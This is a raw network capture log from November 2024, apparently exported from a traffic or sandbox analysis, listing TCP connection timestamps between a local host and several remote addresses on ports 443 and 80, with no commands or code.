                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.211726904 CET4436388013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.211769104 CET63880443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.211777925 CET4436388013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.212002993 CET4436388013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.212186098 CET63880443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.212326050 CET4436388113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.212384939 CET4436388113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.212487936 CET63881443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.212492943 CET4436388113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.212551117 CET63881443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.212629080 CET63880443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.212632895 CET4436388013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.212644100 CET63880443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.212646961 CET4436388013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.214143038 CET63881443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.214150906 CET4436388113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.217159033 CET63885443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.217190981 CET4436388513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.217247009 CET63885443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.217375040 CET44363884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.217433929 CET63884443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.219620943 CET63885443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.219635010 CET4436388513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.220983028 CET63884443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.220998049 CET44363884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.221210003 CET44363884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.222783089 CET63884443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.222982883 CET63884443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.223017931 CET44363884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.224515915 CET63886443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.224536896 CET4436388613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.224586964 CET63886443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.224728107 CET63886443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.224741936 CET4436388613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.226062059 CET63887443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.226070881 CET4436388713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.226119995 CET63887443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.227462053 CET63887443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.227473021 CET4436388713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.228821993 CET63888443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.228858948 CET4436388813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.228954077 CET63888443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.229027987 CET63888443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.229042053 CET4436388813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.232633114 CET63889443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.232646942 CET4436388913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.232721090 CET63889443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.232831001 CET63889443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.232841015 CET4436388913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.951241016 CET4436388613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.952790976 CET63886443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.952816010 CET4436388613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.953227043 CET63886443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.953232050 CET4436388613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.964452982 CET4436388713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.966388941 CET63887443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.966414928 CET4436388713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.966944933 CET63887443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.966949940 CET4436388713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.974776983 CET44363884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.974852085 CET44363884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.974910021 CET63884443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.976191998 CET63884443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.976218939 CET44363884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.979204893 CET4436388913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.980514050 CET63889443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.980530977 CET4436388913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.980911016 CET63889443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.980915070 CET4436388913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.989655018 CET4436388513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.989955902 CET63885443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.989968061 CET4436388513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.990319014 CET63885443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.990324020 CET4436388513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.990453005 CET4436388813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.990715981 CET63888443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.990731955 CET4436388813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.991065025 CET63888443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.991070032 CET4436388813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.080857038 CET4436388613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.080929995 CET4436388613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.080981016 CET63886443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.082662106 CET63886443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.082674980 CET4436388613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.082684994 CET63886443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.082690001 CET4436388613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.092314959 CET63890443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.092345953 CET4436389013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.092433929 CET63890443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.093107939 CET63890443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.093125105 CET4436389013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.094675064 CET4436388713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.094732046 CET4436388713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.094768047 CET4436388713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.094784975 CET63887443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.094814062 CET63887443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.094963074 CET63887443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.094976902 CET4436388713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.094988108 CET63887443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.094994068 CET4436388713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.096904039 CET63891443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.096921921 CET4436389113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.098192930 CET63891443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.098278999 CET63891443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.098289967 CET4436389113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.110388994 CET4436388913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.113374949 CET4436388913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.113405943 CET4436388913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.113409042 CET63889443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.113435030 CET63889443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.114285946 CET63889443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.114291906 CET4436388913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.114315033 CET63889443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.114317894 CET4436388913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.117063046 CET63892443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.117082119 CET4436389213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.118196964 CET63892443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.118335962 CET63892443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.118350029 CET4436389213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.125566006 CET4436388813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.125638008 CET4436388813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.125690937 CET63888443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.125945091 CET4436388513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.125968933 CET4436388513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.126013041 CET63885443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.126024008 CET4436388513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.126085043 CET4436388513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.126117945 CET63885443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.127123117 CET63885443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.127130985 CET4436388513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.127139091 CET63885443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.127142906 CET4436388513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.127739906 CET63888443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.127739906 CET63888443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.127753019 CET4436388813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.127762079 CET4436388813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.144254923 CET63893443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.144269943 CET4436389313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.144892931 CET63893443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.145456076 CET63894443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.145469904 CET4436389413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.145571947 CET63894443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.145854950 CET63893443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.145862103 CET4436389313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.145930052 CET63894443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.145937920 CET4436389413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.574151993 CET6385680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.574554920 CET6389580192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.578953981 CET63896443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.578980923 CET44363896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.579268932 CET8063856185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.579332113 CET6385680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.579355001 CET63896443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.579689980 CET8063895185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.579735994 CET6389580192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.582851887 CET63896443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.582865953 CET44363896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.582989931 CET6389580192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.587795973 CET8063895185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.827023983 CET4436389013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.829181910 CET63890443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.829195976 CET4436389013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.829873085 CET63890443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.829878092 CET4436389013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.863257885 CET4436389113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.866766930 CET63891443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.866784096 CET4436389113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.867152929 CET63891443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.867156982 CET4436389113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.877777100 CET4436389213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.878221989 CET63892443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.878236055 CET4436389213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.878660917 CET63892443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.878667116 CET4436389213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.942507982 CET4436389313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.949877024 CET63893443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.949894905 CET4436389313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.950253010 CET63893443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.950258017 CET4436389313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.958074093 CET4436389013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.958234072 CET4436389013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.958478928 CET63890443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.961829901 CET63890443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.961831093 CET63890443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.961844921 CET4436389013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.961853981 CET4436389013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.971213102 CET63897443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.971236944 CET4436389713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.971295118 CET63897443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.971431017 CET63897443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:25.971441984 CET4436389713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.236372948 CET4436389113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.236418962 CET4436389113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.236459970 CET63891443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.236462116 CET4436389213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.236485004 CET4436389213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.236512899 CET4436389213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.236516953 CET4436389313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.236529112 CET63892443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.236560106 CET63892443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.236566067 CET4436389313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.236658096 CET63893443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.239291906 CET63891443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.239304066 CET4436389113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.239353895 CET63891443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.239358902 CET4436389113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.239408016 CET4436389413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.239413977 CET44363896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.239490986 CET63896443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.243752003 CET63894443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.243763924 CET4436389413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.244235039 CET63894443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.244240046 CET4436389413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.265033960 CET63892443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.265055895 CET4436389213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.288547039 CET63893443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.288547039 CET63893443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.288561106 CET4436389313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.288568974 CET4436389313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.302609921 CET63896443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.302627087 CET44363896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.302860975 CET44363896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.304672956 CET63896443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.304817915 CET63896443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.304850101 CET44363896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.304920912 CET63896443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.304929972 CET44363896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.371649981 CET4436389413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.371835947 CET4436389413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.371877909 CET4436389413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.371892929 CET63894443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.371942043 CET63894443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.387717962 CET63894443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.387734890 CET4436389413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.387743950 CET63894443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.387749910 CET4436389413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.520318985 CET8063895185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.522216082 CET6389580192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.735359907 CET4436389713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.811382055 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.811614037 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.813833952 CET63897443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.813852072 CET4436389713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.814251900 CET63897443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.814256907 CET4436389713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.816282034 CET63899443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.816297054 CET4436389913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.816356897 CET63899443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.816471100 CET63899443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.816479921 CET4436389913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.816553116 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.816603899 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.816860914 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.816903114 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.818995953 CET63900443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.819071054 CET4436390013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.819152117 CET63900443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.819185019 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.819721937 CET63900443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.819757938 CET4436390013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.820559978 CET63901443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.820642948 CET4436390113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.820797920 CET63901443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.820913076 CET63901443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.820950985 CET4436390113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.821516037 CET63902443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.821538925 CET4436390213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.821599960 CET63902443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.823502064 CET63902443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.823524952 CET4436390213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.823956966 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.993391991 CET44363896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.993484974 CET44363896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:26.993594885 CET63896443192.168.2.4188.114.96.3
